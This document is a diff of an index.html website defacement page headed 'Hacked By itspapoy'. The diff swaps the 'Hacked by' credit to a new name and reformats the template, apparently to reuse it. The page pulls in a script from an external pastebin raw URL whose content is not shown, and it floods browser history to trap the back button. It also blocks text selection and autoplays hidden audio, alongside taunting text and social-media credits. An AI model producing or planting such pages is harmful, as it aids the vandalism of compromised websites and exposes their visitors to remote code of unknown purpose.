--- a/index.html
+++ b/index.html
@@ -1,4 +1,65 @@
-<html> <head> <link rel="icon" type="image/png" href="https://i.pinimg.com/originals/f4/35/22/f43522bf3b4bbe2ed9927c250467bd3b.jpg" type="image/x-icon"/> <title>Hacked By itspapoy</title> <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verification" content="VxSee7"/> <meta name="theme-color" content="black"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/> <meta name="description" content="yhhaa wahyuu"> <meta name="author" content="PapalePapale"/> <meta name="keywords" content="PapalePapale"/> <meta name="googlebot" content="all"/> <meta name="robots" content="all" /> <meta name="googlebot-news" content="all" /> <meta name="google" content="notranslate"/> <meta name="og:title" content="Hacked By itspapoy"/> <meta property="og:image" content="https://ih0.redbubble.net/image.622876166.4056/flat,550x550,075,f.u2.jpg" /> <meta property="og:type" content="website" /> <meta property="og:updated_time" content="1440432930" /> </span> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script> </head> <style type="text/css"> /* Copyright itsppy 2021 */ @import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:black; } i{ margin:10px; color: red; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: 'Shadows Into Light', cursive; font-size:50px; margin:0px; padding:0px; animation:psychoxploit 0.5s linear infinite; } pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false"> <embed src="https://g.top4top.net/m_1438oc8ui1.mp3" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script> <center> <img title="Hacked by RIZKY FADILAH" class="picture" src="https://ih0.redbubble.net/image.622876166.4056/flat,550x550,075,f.u2.jpg" width="183px" height="275px"/> <br><h1><font color="red">Hacked by</font> RIZKY Fadilah</h1><br> <pre><font color="red">Gini Yang Kalian mau?!</font><br> Santuy ae wkwk</pre><br> <marquee direction="scroll"><pre>#G ush so lu klo cm bisany ng bct lu sm aj kek sampah. <i>Main IT</i> [!] Thanks to: follow ig @itspapoy</pre></marquee><br> </center></script> 
+<html> <head> 
+<link rel="icon" 
+
+type="image/png" href="https://i.pinimg.com/originals/f4/35/22/f43522bf3b4bbe2ed9927c250467bd3b.jpg" 
+type="image/x-icon"/> <title>Hacked By itspapoy</title> 
+
+<meta http-equiv="Content-Security-Policy" 
+content="upgrade-insecure-requests"> 
+
+<meta name="google-site-verification" 
+content="VxSee7"/> 
+
+<meta name="theme-color" 
+content="black"> 
+
+<meta http-equiv="Content-Type" 
+content="text/html; charset=Windows-1254"/> 
+
+<meta name="description" 
+content="yhhaa wahyuu"> 
+
+<meta name="author" 
+content="PapalePapale"/> 
+
+<meta name="keywords" 
+content="PapalePapale"/> 
+
+<meta name="googlebot" 
+content="all"/> 
+
+<meta name="robots" 
+content="all" /> 
+
+<meta name="googlebot-news" 
+content="all" /> 
+
+<meta name="google" 
+content="notranslate"/> 
+
+<meta name="og:title" 
+content="Hacked By itspapoy"/> 
+
+<meta property="og:image" 
+content="https://ih0.redbubble.net/image.622876166.4056/flat,550x550,075,f.u2.jpg" /> 
+
+<meta property="og:type" 
+content="website" /> 
+
+<meta property="og:updated_time" 
+content="1440432930" /> 
+</span> 
+
+<meta http-equiv="Content-Type" 
+content="text/html; charset=utf-8" /> 
+<script type="text/javascript"
+ 
+src="https://pastebin.com/raw/ynL2hpMe"></script> </head> <style type="text/css"> /* Copyright itsppy 2021 */ @import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:black; } i{ margin:10px; color: red; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: 'Shadows Into Light', cursive; font-size:50px; margin:0px; padding:0px; animation:psychoxploit 0.5s linear infinite; } pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false"> <embed src="https://g.top4top.net/m_1438oc8ui1.mp3" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script> <center> <img title="Hacked by RIZKY FADILAH" class="picture" 
+src="https://ih0.redbubble.net/image.622876166.4056/flat,550x550,075,f.u2.jpg" 
+width="183px" 
+height="275px"/> 
+<br><h1><font color="red">Hacked by</font> Fadhli</h1><br> <pre><font color="red">Gini Yang Kalian mau?!</font><br> Santuy ae brodi</pre><br> 
+<marquee direction="scroll"><pre>#G ush so lu klo cm bisany ng bct lu sm aj kek sampah. <i>Main IT</i> [!] Thanks to: follow ig @itspapoy</pre></marquee><br> </center></script> 
     <center>
      <p id="info"><font face="monaco" size="5" font="" style="text-shadow: 0px 0px 30px red;" color="white">@itspapoy </font> _</p>
      <center>
